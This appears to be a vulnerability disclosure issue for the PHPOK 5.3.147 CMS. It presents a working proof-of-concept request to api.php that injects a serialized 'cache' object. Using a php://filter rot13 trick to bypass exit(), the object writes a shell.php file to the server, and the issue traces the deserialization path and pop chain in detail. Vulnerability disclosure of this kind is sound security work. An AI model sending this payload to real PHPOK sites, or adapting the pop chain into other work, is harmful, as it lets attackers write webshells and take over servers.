PHPOK Version 5.3.147

poc

http://127.0.0.1:8000/5.3.147/api.php?c=call&f=index&data=%7B%22m_picplayer%22%3A%7B%22site%22%3A1%2C%22type_id%22%3A%22format_ext_all%22%2C%220%22%3A%7B%22form_type%22%3A%22url%22%2C%22content%22%3A%22O%3A5%3A%5C%22cache%5C%22%3A4%3A%7Bs%3A9%3A%5C%22%5Cu0000%2A%5Cu0000folder%5C%22%3Bs%3A41%3A%5C%22php%3A%5C%2F%5C%2Ffilter%5C%2Fwrite%3Dstring.rot13%5C%2Fresource%3D%5C%22%3Bs%3A11%3A%5C%22%5Cu0000%2A%5Cu0000key_list%5C%22%3Bs%3A19%3A%5C%22%3C%3Fcuc+cucvasb%28%29%3B+%3F%3E%5C%22%3Bs%3A9%3A%5C%22%5Cu0000%2A%5Cu0000key_id%5C%22%3Bs%3A5%3A%5C%22shell%5C%22%3Bs%3A9%3A%5C%22%5Cu0000%2A%5Cu0000status%5C%22%3Bb%3A1%3B%7D%22%7D%7D%7D

analysis

framework/api/call_control.php::index_f

The front desk can pass data in json format. After decoding, the controllable data is assigned to $tmpValue, then enters the phpok function

framework/phpok_tpl_helper.php::phpok

$GLOBALS['app']->call->phpok($id,$ext) is phpok_call.php::phpok()

framework/phpok_call.php::phpok

$rs is completely controllable, so you can control the $func but there is a limitation

if(!in_array($func,$this->mlist)){
    return false;
}

dump$this->mlist now we know all functions starting with _ in this class can be called, and i found the _format_ext_all function is vulnerable

framework/phpok_call.php::_format_ext_all

If you can control $value['content'], it will lead to a deserialization vulnerability, $value from $rslist, $rslist from $call_rs, $call_rs from the data we passed in

popchain

framework/engine/cache.php::__destruct

framework/engine/cache.php::save

$this-> folder is controllable, so we can use php://filter/write=string.rot13/resource= to bypass exit();

result

shell.php

<?cuc rkvg();?>f:19:"<?php phpinfo(); ?>";

qinggan / phpok

PHPOK5.3 deserialization vulnerability to getshell #6

poc